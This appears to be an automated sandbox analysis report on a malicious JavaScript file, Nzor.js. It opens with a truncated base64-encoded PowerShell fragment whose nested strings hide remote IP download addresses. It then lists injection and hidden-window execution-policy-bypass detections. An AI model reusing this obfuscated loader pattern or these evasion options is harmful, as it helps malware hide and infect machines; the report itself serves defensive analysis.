gAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBnAEEAdQBBAEQASQBBAE0AdwBBADQAQQBDADQAQQBPAFEAQQAzAEEAQwA0AEEATQBRAEEAMgBBAEQAawBBACIAOwBiAHIAZQBhAGsAOwBOAGUAeAB0AEoAUwA7AH0ATgBlAHgAdABKAFMAOwB9ACAAYwBhAHQAYwBoACAAewAkAEoAbwB1AG4AYwBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBADIAQQBDADQAQQBNAFEAQQAxAEEARABZAEEATABnAEEAeABBAEQARQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQAxAEEAQQA9AD0AUgBiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE8AUQBBAHUAQQBEAFkAQQBOAGcAQQB1AEEARABFAEEATgBBAEEAMgBBAEMANABBAE0AZwBBADEAQQBEAEUAQQAiADsAfQB9ACQAbQBvAGQAdQBsAGEAcgBpAHoAaQBuAGcAQwByAHUAbgBrAGwAZQAgAD0AIAAzADIANAA7AA=="

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2052 resumed a thread in remote process 2148
Process injection	Process 2148 resumed a thread in remote process 2296
NtResumeThread May 16, 2023, 10:33 a.m.	thread_handle: 0x00000304 suspend_count: 1 process_identifier: 2148	1	0	0
NtResumeThread May 16, 2023, 10:33 a.m.	thread_handle: 0x00000300 suspend_count: 1 process_identifier: 2296	1	0	0

Creates a suspicious Powershell process (8 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-nologo	value	Hides the copyright banner when PowerShell launches
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-nologo	value	Hides the copyright banner when PowerShell launches
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The process wscript.exe wrote an executable file to disk which it then attempted to execute (2 events)

file	C:\Windows\SysWOW64\wscript.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Nzor.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All